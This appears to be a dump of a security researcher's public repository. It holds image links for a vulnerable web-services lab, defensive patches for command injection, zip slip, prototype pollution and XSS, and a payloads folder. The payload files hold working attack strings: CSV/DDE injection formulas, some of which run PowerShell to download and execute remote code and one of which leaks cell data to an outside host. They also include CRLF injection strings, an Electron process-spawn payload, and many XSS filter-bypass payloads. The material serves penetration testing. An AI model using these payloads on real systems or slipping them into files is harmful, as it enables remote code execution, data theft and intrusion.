--------------------------------------------------------------------------------
/dvws/content-type-xss2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/content-type-xss2.png


--------------------------------------------------------------------------------
/dvws/cors.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/cors.png


--------------------------------------------------------------------------------
/dvws/csti.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/csti.png


--------------------------------------------------------------------------------
/dvws/cxss-xml1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/cxss-xml1.png


--------------------------------------------------------------------------------
/dvws/cxss-xml2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/cxss-xml2.png


--------------------------------------------------------------------------------
/dvws/dvws.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/dvws.png


--------------------------------------------------------------------------------
/dvws/info_disclosure.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/info_disclosure.png


--------------------------------------------------------------------------------
/dvws/json-hijacking1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/json-hijacking1.png


--------------------------------------------------------------------------------
/dvws/jwt2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/jwt2.png


--------------------------------------------------------------------------------
/dvws/jwt3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/jwt3.png


--------------------------------------------------------------------------------
/dvws/jwt4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/jwt4.png


--------------------------------------------------------------------------------
/dvws/mass_assignment.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/mass_assignment.png


--------------------------------------------------------------------------------
/dvws/nosqlinjection.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/nosqlinjection.png


--------------------------------------------------------------------------------
/dvws/nosqlinjection2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/nosqlinjection2.png


--------------------------------------------------------------------------------
/dvws/postmessage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/postmessage.png


--------------------------------------------------------------------------------
/dvws/postmessage1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/postmessage1.png


--------------------------------------------------------------------------------
/dvws/pp1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/pp1.png


--------------------------------------------------------------------------------
/dvws/pp2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/pp2.png


--------------------------------------------------------------------------------
/dvws/pt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/pt.png


--------------------------------------------------------------------------------
/dvws/readme.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/dvws/sqlinjection.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/sqlinjection.png


--------------------------------------------------------------------------------
/dvws/sqlinjection1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/sqlinjection1.png


--------------------------------------------------------------------------------
/dvws/sqlinjection3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/sqlinjection3.png


--------------------------------------------------------------------------------
/dvws/xmlxss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/xmlxss.png


--------------------------------------------------------------------------------
/dvws/xpath1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/xpath1.png


--------------------------------------------------------------------------------
/dvws/xpath2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/xpath2.png


--------------------------------------------------------------------------------
/dvws/xpath3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/xpath3.png


--------------------------------------------------------------------------------
/evil.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/evil.tar.gz


--------------------------------------------------------------------------------
/patches/CVE-2019-10787-im-resize.patch:
--------------------------------------------------------------------------------
 1 | From de624dacf6a50e39fe3472af1414d44937ce1f03 Mon Sep 17 00:00:00 2001
 2 | From: Sam Sanoop <sams@snyk.io>
 3 | Date: Mon, 3 Feb 2020 21:25:54 +0000
 4 | Subject: [PATCH] fix: check image arguments before processing (#19)
 5 | 
 6 | Regex hotfix to check for command injection
 7 | ---
 8 |  index.js | 4 ++++
 9 |  1 file changed, 4 insertions(+)
10 | 
11 | diff --git a/index.js b/index.js
12 | index 16654d1..4ca6998 100644
13 | --- a/index.js
14 | +++ b/index.js
15 | @@ -7,6 +7,9 @@ var join = require('path').join;
16 |  var sprintf = require('util').format;
17 |  
18 |  module.exports = function(image, output, cb) {
19 | +  if(/;|&|`|\$|\(|\)|\|\||\||!|>|<|\?|\${/g.test(JSON.stringify(image))) {
20 | +    console.log('Input Validation failed, Suspicious Characters found');
21 | +  } else {
22 |    var cmd = module.exports.cmd(image, output);
23 |    exec(cmd, {timeout: 30000}, function(e, stdout, stderr) {
24 |      if (e) { return cb(e); }
25 | @@ -14,6 +17,7 @@ module.exports = function(image, output, cb) {
26 |  
27 |      return cb(null, output.versions);
28 |    });
29 | +}
30 |  };
31 |  
32 |  /**
33 | 


--------------------------------------------------------------------------------
/patches/CVE-2019-10788-im-metadata.patch:
--------------------------------------------------------------------------------
 1 | From ea15dddbe0f65694bfde36b78dd488e90f246639 Mon Sep 17 00:00:00 2001
 2 | From: Sam Sanoop <sams@snyk.io>
 3 | Date: Mon, 3 Feb 2020 21:26:09 +0000
 4 | Subject: [PATCH] fix: check path argument before processing (#10)
 5 | 
 6 | hotfix to re mediate command injection
 7 | ---
 8 |  index.js | 15 +++++++++------
 9 |  1 file changed, 9 insertions(+), 6 deletions(-)
10 | 
11 | diff --git a/index.js b/index.js
12 | index d85f5ff..54b8ed6 100644
13 | --- a/index.js
14 | +++ b/index.js
15 | @@ -9,15 +9,18 @@ module.exports = function(path, opts, cb) {
16 |      opts = {};
17 |    }
18 |  
19 | -  var cmd = module.exports.cmd(path, opts);
20 | -  opts.timeout = opts.timeout || 5000;
21 | -
22 | -  exec(cmd, opts, function(e, stdout, stderr) {
23 | -    if (e) { return cb(e); }
24 | +  if(/;|&|`|\$|\(|\)|\|\||\||!|>|<|\?|\${/g.test(JSON.stringify(path))) {
25 | +    console.log('Input Validation failed, Suspicious Characters found');
26 | +  } else {
27 | +    var cmd = module.exports.cmd(path, opts);
28 | +    opts.timeout = opts.timeout || 5000;
29 | +    exec(cmd, opts, function(e, stdout, stderr) {
30 | +      if (e) { return cb(e); }
31 |      if (stderr) { return cb(new Error(stderr)); }
32 |  
33 | -    return cb(null, module.exports.parse(path, stdout, opts));
34 | +      return cb(null, module.exports.parse(path, stdout, opts));
35 |    });
36 | +}
37 |  };
38 |  
39 |  module.exports.cmd = function(path, opts) {
40 | 


--------------------------------------------------------------------------------
/patches/CVE-2020-7749.patch:
--------------------------------------------------------------------------------
 1 | From 923ffee906fe365c9bbe05ec8dbf40b4eb695711 Mon Sep 17 00:00:00 2001
 2 | From: snoopysecurity <sams@snyk.io>
 3 | Date: Mon, 12 Oct 2020 00:25:42 +0100
 4 | Subject: [PATCH] fix: escape special characters before insertion to template
 5 | 
 6 | ---
 7 |  src/server.js | 31 +++++++++++++++++++++++++------
 8 |  1 file changed, 25 insertions(+), 6 deletions(-)
 9 | 
10 | diff --git a/src/server.js b/src/server.js
11 | index 5da037e..4477d46 100644
12 | --- a/src/server.js
13 | +++ b/src/server.js
14 | @@ -19,6 +19,23 @@ app.use((req, res, next) => {
15 |    next();
16 |  });
17 |  
18 | +
19 | +function htmlEscape(text) {
20 | +  return text.replace(/&/g, '&amp;').
21 | +  replace(/</g, '&lt;').
22 | +  replace(/"/g, '&quot;').
23 | +  replace(/'/g, '&#039;');
24 | +}
25 | +
26 | +
27 | +function sanitize(params) {
28 | +  result = {}
29 | +  for (let [key, value] of Object.entries(params)) {
30 | +      result[key] = htmlEscape(value)
31 | +  }
32 | +  return result;
33 | +}
34 | +
35 |  app.get("/health", (req, res) => res.sendStatus(200));
36 |  
37 |  const handler = (res, params) => {
38 | @@ -30,12 +47,14 @@ const handler = (res, params) => {
39 |  app.get("/", (req, res) => handler(res, req.query));
40 |  app.post("/", (req, res) => handler(res, req.body));
41 |  
42 | -app.get("/dynamic", (req, res) =>
43 | -  handler(res, { ...req.query, renderToHtml: true })
44 | -);
45 | +app.get("/dynamic", (req, res) => {
46 | +  var sanitized = sanitize(req.query)
47 | +  handler(res, { ...sanitized, renderToHtml: true })
48 | +})
49 |  
50 | -app.post("/dynamic", (req, res) =>
51 | -  handler(res, { ...req.body, renderToHtml: true })
52 | -);
53 | +app.post("/dynamic", (req, res) => {
54 | +  var sanitized = sanitize(req.body)
55 | +  handler(res, { ...sanitized, renderToHtml: true })
56 | +})
57 |  
58 |  module.exports = http.createServer(app);
59 | 


--------------------------------------------------------------------------------
/patches/Chumper-Zipper-Zip-Slip.patch:
--------------------------------------------------------------------------------
 1 | From d15207e010f8fe1bdd341376bd86d599c4166423 Mon Sep 17 00:00:00 2001
 2 | From: Sam Sanoop <sams@snyk.io>
 3 | Date: Tue, 25 Feb 2020 11:57:40 +0000
 4 | Subject: [PATCH] Prevent Zip Traversal Attacks (#156)
 5 | 
 6 | Checks for special characters within filenames within a ZIP file using strpos comparison
 7 | ---
 8 |  src/Chumper/Zipper/Zipper.php | 5 +++++
 9 |  1 file changed, 5 insertions(+)
10 | 
11 | diff --git a/src/Chumper/Zipper/Zipper.php b/src/Chumper/Zipper/Zipper.php
12 | index c92b11d..c6f75b5 100644
13 | --- a/src/Chumper/Zipper/Zipper.php
14 | +++ b/src/Chumper/Zipper/Zipper.php
15 | @@ -613,6 +613,11 @@ private function extractFilesInternal($path, callable $matchingMethod)
16 |      private function extractOneFileInternal($fileName, $path)
17 |      {
18 |          $tmpPath = str_replace($this->getInternalPath(), '', $fileName);
19 | +        
20 | +        //Prevent Zip traversal attacks
21 | +        if (strpos($fileName, '../') !== false || strpos($fileName, '..\\') !== false) {
22 | +            throw new \RuntimeException('Special characters found within filenames');
23 | +        }
24 |  
25 |          // We need to create the directory first in case it doesn't exist
26 |          $dir = pathinfo($path.DIRECTORY_SEPARATOR.$tmpPath, PATHINFO_DIRNAME);
27 | 


--------------------------------------------------------------------------------
/patches/DariousIII-Zipper-Zip-Slip.patch:
--------------------------------------------------------------------------------
 1 | From c7f97c9d60caf5fbb0227b7639993566d60ab96e Mon Sep 17 00:00:00 2001
 2 | From: Sam Sanoop <sams@snyk.io>
 3 | Date: Sun, 23 Feb 2020 12:36:25 +0000
 4 | Subject: [PATCH] Prevent Zip Traversal Attacks
 5 | 
 6 | Checks for special characters within filenames within a ZIP file using strpos comparison
 7 | ---
 8 |  src/DariusIII/Zipper/Zipper.php | 5 ++++-
 9 |  1 file changed, 4 insertions(+), 1 deletion(-)
10 | 
11 | diff --git a/src/DariusIII/Zipper/Zipper.php b/src/DariusIII/Zipper/Zipper.php
12 | index 708fdfc..5b0649c 100644
13 | --- a/src/DariusIII/Zipper/Zipper.php
14 | +++ b/src/DariusIII/Zipper/Zipper.php
15 | @@ -622,7 +622,10 @@ private function extractFilesInternal($path, callable $matchingMethod): void
16 |      private function extractOneFileInternal($fileName, $path)
17 |      {
18 |          $tmpPath = str_replace($this->getInternalPath(), '', $fileName);
19 | -
20 | +        //Prevent Zip Traversal Attacks
21 | +        if (strpos($fileName, '../') !== false || strpos($fileName, '..\\') !== false) {
22 | +            throw new \RuntimeException('Special characters found within filenames');
23 | +        }
24 |          // We need to create the directory first in case it doesn't exist
25 |          $dir = pathinfo($path.DIRECTORY_SEPARATOR.$tmpPath, PATHINFO_DIRNAME);
26 |          if (!$this->file->exists($dir) && !$this->file->makeDirectory($dir, 0755, true, true)) {
27 | 


--------------------------------------------------------------------------------
/patches/SNYK-JS-UTILSEXTEND-560385.patch:
--------------------------------------------------------------------------------
 1 | From 3d78a224145a3468e6be59b6857134680f6a2ab8 Mon Sep 17 00:00:00 2001
 2 | From: snoopysecurity <sams@snyk.io>
 3 | Date: Sat, 7 Mar 2020 18:25:55 +0000
 4 | Subject: [PATCH] Fix: Prevent Prototype Pollution
 5 | 
 6 | ---
 7 |  index.js | 3 ++-
 8 |  1 file changed, 2 insertions(+), 1 deletion(-)
 9 | 
10 | diff --git a/index.js b/index.js
11 | index 5fecaa0..fa89a3a 100644
12 | --- a/index.js
13 | +++ b/index.js
14 | @@ -29,7 +29,7 @@ function extend(target, source) {
15 |  
16 |    for (var key in source) {
17 |      value = source[key];
18 | -
19 | +    if(key !== '__proto__') {
20 |      if (Array.isArray(value)) {
21 |        if (!Array.isArray(target[key])) {
22 |          target[key] = [];
23 | @@ -46,6 +46,7 @@ function extend(target, source) {
24 |        target[key] = value;
25 |      }
26 |    }
27 | +  }
28 |  
29 |    return target;
30 |  }
31 | 


--------------------------------------------------------------------------------
/patches/dompurify.txt:
--------------------------------------------------------------------------------
 1 | //https://github.com/netlify/netlify-cms/issues/4099
 2 | 
 3 | //Initialize Dompurify
 4 | const createDOMPurify = require('dompurify');
 5 | const { JSDOM } = require('jsdom');
 6 | 
 7 | const window = new JSDOM('').window;
 8 | const DOMPurify = createDOMPurify(window);
 9 | 
10 | //Then sanitising the html generated from `markdownToHtml`
11 | 
12 | const sanitizer = dompurify.sanitize;
13 | const html = markdownToHtml(value, { getAsset, resolveWidget });
14 | return <WidgetPreviewContainer dangerouslySetInnerHTML={{ __html: sanitizer(html) }} />;
15 | 


--------------------------------------------------------------------------------
/patches/lodash_0_0_20200429_6baae67d501e4c45021280876d42efe351e77551.patch:
--------------------------------------------------------------------------------
 1 | # Licence
 2 | # ---------
 3 | # The MIT License
 4 | 
 5 | # Copyright JS Foundation and other contributors <https://js.foundation/>
 6 | 
 7 | # Based on Underscore.js, copyright Jeremy Ashkenas,
 8 | # DocumentCloud and Investigative Reporters & Editors <http://underscorejs.org/>
 9 | 
10 | # This software consists of voluntary contributions made by many
11 | # individuals. For exact contribution history, see the revision history
12 | # available at https://github.com/lodash/lodash
13 | 
14 | # The following license applies to all parts of this software except as
15 | # documented below:
16 | 
17 | # ====
18 | 
19 | # Permission is hereby granted, free of charge, to any person obtaining
20 | # a copy of this software and associated documentation files (the
21 | # "Software"), to deal in the Software without restriction, including
22 | # without limitation the rights to use, copy, modify, merge, publish,
23 | # distribute, sublicense, and/or sell copies of the Software, and to
24 | # permit persons to whom the Software is furnished to do so, subject to
25 | # the following conditions:
26 | 
27 | # The above copyright notice and this permission notice shall be
28 | # included in all copies or substantial portions of the Software.
29 | 
30 | # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
31 | # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
32 | # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
33 | # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
34 | # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
35 | # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
36 | # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
37 | 
38 | # ====
39 | 
40 | # Copyright and related rights for sample code are waived via CC0. Sample
41 | # code is defined as all source code displayed within the prose of the
42 | # documentation.
43 | 
44 | # CC0: http://creativecommons.org/publicdomain/zero/1.0/
45 | 
46 | # ====
47 | 
48 | # Files located in the node_modules and vendor directories are externally
49 | # maintained libraries used by this software which have their own
50 | # licenses; we recommend you read them, as their terms may differ from the
51 | # terms above.
52 | diff --git a/lodash.js b/lodash.js
53 | index 9b95dfef..43e71ffb 100644
54 | --- a/lodash.js
55 | +++ b/lodash.js
56 | @@ -3977,6 +3977,11 @@
57 |          var key = toKey(path[index]),
58 |              newValue = value;
59 |  
60 | +        // TODO: Is there a valid use case to allow any of them?
61 | +        if ((key === '__proto__' || key === 'constructor' || key === 'prototype')) {
62 | +          return object;
63 | +        }
64 | +
65 |          if (index != lastIndex) {
66 |            var objValue = nested[key];
67 |            newValue = customizer ? customizer(objValue, key, nested) : undefined;
68 | 
69 |  
70 | 


--------------------------------------------------------------------------------
/patches/madzipper-Zip-Slip.patch:
--------------------------------------------------------------------------------
 1 | From 13d2f1a68518545a2338458a8b95175aaec67768 Mon Sep 17 00:00:00 2001
 2 | From: Sam Sanoop <sams@snyk.io>
 3 | Date: Sun, 23 Feb 2020 13:18:08 +0000
 4 | Subject: [PATCH] Prevent Zip Traversal Attacks
 5 | 
 6 | Checks for special characters within filenames within a ZIP file using strpos comparison
 7 | ---
 8 |  src/Madnest/Madzipper/Madzipper.php | 4 ++++
 9 |  1 file changed, 4 insertions(+)
10 | 
11 | diff --git a/src/Madnest/Madzipper/Madzipper.php b/src/Madnest/Madzipper/Madzipper.php
12 | index 5d96494..421e050 100644
13 | --- a/src/Madnest/Madzipper/Madzipper.php
14 | +++ b/src/Madnest/Madzipper/Madzipper.php
15 | @@ -613,6 +613,10 @@ private function extractOneFileInternal($fileName, $path)
16 |      {
17 |          $tmpPath = str_replace($this->getInternalPath(), '', $fileName);
18 |  
19 | +        //Prevent Zip traversal attacks
20 | +        if (strpos($fileName, '../') !== false || strpos($fileName, '..\\') !== false) {
21 | +            throw new \RuntimeException('Special characters found within filenames');
22 | +        }
23 |          // We need to create the directory first in case it doesn't exist
24 |          $dir = pathinfo($path . DIRECTORY_SEPARATOR . $tmpPath, PATHINFO_DIRNAME);
25 |          if (!$this->file->exists($dir) && !$this->file->makeDirectory($dir, 0755, true, true)) {
26 | 


--------------------------------------------------------------------------------
/payloads/alert.js:
--------------------------------------------------------------------------------
1 | alert(document.domain);
2 | 


--------------------------------------------------------------------------------
/payloads/crlf.txt:
--------------------------------------------------------------------------------
 1 | 		"%00",
 2 | 		"%0a",
 3 | 		"%0a%20",
 4 | 		"%0d",
 5 | 		"%0d%09",
 6 | 		"%0d%0a",
 7 | 		"%0d%0a%09",
 8 | 		"%0d%0a%20",
 9 | 		"%0d%20",
10 | 		"%20",
11 | 		"%20%0a",
12 | 		"%20%0d",
13 | 		"%20%0d%0a",
14 | 		"%23%0a",
15 | 		"%23%0a%20",
16 | 		"%23%0d",
17 | 		"%23%0d%0a",
18 | 		"%23%oa",
19 | 		"%25%30",
20 | 		"%25%30%61",
21 | 		"%2e%2e%2f%0d%0a",
22 | 		"%2f%2e%2e%0d%0a",
23 | 		"%2f..%0d%0a",
24 | 		"%3f",
25 | 		"%3f%0a",
26 | 		"%3f%0d",
27 | 		"%3f%0d%0a",
28 | 		"%e5%98%8a%e5%98%8d",
29 | 		"%e5%98%8a%e5%98%8d%0a",
30 | 		"%e5%98%8a%e5%98%8d%0d",
31 | 		"%e5%98%8a%e5%98%8d%0d%0a",
32 | 		"%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d",
33 | 		"%u0000",
34 | 		"%u000a",
35 | 		"%u000d",
36 | 		"\r",
37 | 		"\r%20",
38 | 		"\r\n",
39 | 		"\r\n%20",
40 | 		"\r\n\t",
41 | 		"\r\t",
42 | 


--------------------------------------------------------------------------------
/payloads/csvinjection.txt:
--------------------------------------------------------------------------------
 1 | =HYPERLINK("http://evilsite?foo="&A1&A2,"Error: please click for further information")
 2 | =DDE("cmd";"/C calc";"__DdeLink_60_870516294")
 3 | =cmd|' /C calc'!A0
 4 | @SUM(1+2+3)*cmd|' /C calc'!A0
 5 | @SUM(1+1)*cmd|' /C calc'!A0 
 6 | ":";-3+3+cmd|' /C calc'!D2
 7 | =cmd|'/C powershell IEX(wget foo.bar/p)'!A0
 8 | @SUM(1+2+3)*cmd|'/C powershell IEX(wget 0r.pe/p)'!A0
 9 | @SUM(1+1)*cmd|' powershell IEX(wget 0r.pe/p)'!A0
10 | 


--------------------------------------------------------------------------------
/payloads/electron.js:
--------------------------------------------------------------------------------
1 | var Process = process.binding('process_wrap').Process;
2 | var proc = new Process();
3 | proc.onexit = function(a,b) {};
4 | var env = process.env;
5 | var env_ = [];
6 | for (var key in env) env_.push(key+'='+env[key]);
7 | proc.spawn({file:'cmd.exe',args:['/k netplwiz'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
8 | 


--------------------------------------------------------------------------------
/payloads/electronxsspayloads:
--------------------------------------------------------------------------------
1 | "><img src=1 onerror="var os = require('os'); var hostname = os.platform(); var homedir = os.homedir(); alert('Host:' + hostname + 'directory: ' + homedir);">
2 | <onmouseover="alert(1)"> <s onmouseover="var os = require('os'); var hostname = os.platform(); var homedir = os.homedir(); alert('Host:' + hostname + 'directory: ' + homedir);">Hallo</s>
3 | <iframe src=x onload="require('electron').shell.openExternal('/System/Applications/Calculator.app')"></iframe>
4 | 


--------------------------------------------------------------------------------
/payloads/evil.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/payloads/evil.tar.gz


--------------------------------------------------------------------------------
/payloads/evil.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/payloads/evil.zip


--------------------------------------------------------------------------------
/payloads/foo.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <users>
 3 |   <user type="admin">
 4 |     <name>Elliot</name>
 5 |     <social>
 6 |       <facebook>https://facebook.com</facebook>
 7 |       <twitter>https://twitter.com</twitter>
 8 |       <youtube>https://youtube.com</youtube>
 9 |     </social>
10 |   </user>
11 |   <user type="reader">
12 |     <name>Fraser</name>
13 |     <social>
14 |       <facebook>https://facebook.com</facebook>
15 |       <twitter>https://twitter.com</twitter>
16 |       <youtube>https://youtube.com</youtube>
17 |     </social>
18 |   </user>
19 | </users>
20 | 


--------------------------------------------------------------------------------
/payloads/hrefpayloads.txt:
--------------------------------------------------------------------------------
 1 | <svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a></svg>
 2 | <set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
 3 | <animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
 4 | <a href="javascript&#9;:alert(document.domain)">test 7</a>
 5 | <a href="javascrip&#9;t:alert('0xd0ff9')">test 8</a>
 6 | <a href="jAvaScript:alert(1)">1</a> 
 7 | <a href="vbscript:alert(2)">2</a> 
 8 | <a href="java\u0000script:alert(3)">3</a> 
 9 | <a href="\njavascript:alert(4)">4</a> 
10 | <a href="java\nscript:alert(5)">5</a> 
11 | <a href="java\tscript:alert(6)">6</a> 
12 | <a href="%6aavascript:alert(7)">7</a> 
13 | <a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik">8</a> 
14 | <a href=" dAt%61: tExt/html  ; bAse64 , PHN2Zy9vbmxvYWQ9YWxlcnQoMik">9</a> 
15 | <a xlink:href="jAvaScript:alert(1)">14</a> 
16 | <a href="%5Ba%5Djava%5Bb%5Dscript%5Bc%5D%3Aalert(1)">XXX</a>
17 | <a href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)">test 1</a>
18 | <a href="javascript&colon;alert&#40/1/&#41">Hello</a>
19 | <a href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)">test 1</a>
20 | <a href="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">test 1</a>
21 | <a href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)">test 1</a>
22 | <isindex action="javas&tab;cript:alert(1)" type=image>
23 | <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
24 | javascript&#00058;alert(1)
25 | javaSCRIPT&colon;alert(1)
26 | JaVaScRipT:alert(1)
27 | javas&Tab;cript:\u0061lert(1);
28 | javascript:\u0061lert&#x28;1&#x29
29 | javascript&#x3A;alert&lpar;document&period;cookie&rpar;
30 | vbscript:alert(1);
31 | vbscript&#00058;alert(1);
32 | vbscr&Tab;ipt:alert(1)"
33 | Data URl
34 | data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
35 | <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
36 | <a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
37 | <animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
38 | <set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
39 | <animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
40 | <math href="javascript:alert(1)">CLICKME</math>
41 | <object data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik">10</object> 
42 | <button formaction="javascript:alert(11)">11</button> 
43 | <table background="javascript:alert(12)"><tr><tr>12</tr></tr></table> 
44 | <a xlink:href="javascript	:alert(document.domain)">test 7</a>
45 | <a xlink:href="javascrip	t:alert('0xd0ff9')">test 8</a>
46 | <a xlink:href="javas&tab;cript:alert(1)">test 7</a>
47 | <a xlink:href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)">test 8</a>
48 | <a xlink:href="javascript&#00058;alert(1)">test 7</a>
49 | <a xlink:href="javaSCRIPT&colon;alert(1)">test 7</a>
50 | <a xlink:href="JaVaScRipT:alert(1)">test 7</a>
51 | <a xlink:href="javas&Tab;cript:\u0061lert(1);">test 7</a>
52 | <a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
53 | <animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
54 | <set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
55 | <animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
56 | <svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a></svg>
57 | <set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
58 | <animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
59 | <a href="javascript&#9;:alert(document.domain)">test 7</a>
60 | <a href="javascrip&#9;t:alert('0xd0ff9')">test 8</a>
61 | <a href="jAvaScript:alert(1)">1</a> 
62 | <a href="vbscript:alert(2)">2</a> 
63 | <a href="java\u0000script:alert(3)">3</a> 
64 | <a href="\njavascript:alert(4)">4</a> 
65 | <a href="java\nscript:alert(5)">5</a> 
66 | <a href="java\tscript:alert(6)">6</a> 
67 | <a href="%6aavascript:alert(7)">7</a> 
68 | <a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik">8</a> 
69 | <a href=" dAt%61: tExt/html  ; bAse64 , PHN2Zy9vbmxvYWQ9YWxlcnQoMik">9</a> 
70 | <object data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik">10</object> 
71 | <button formaction="javascript:alert(11)">11</button> 
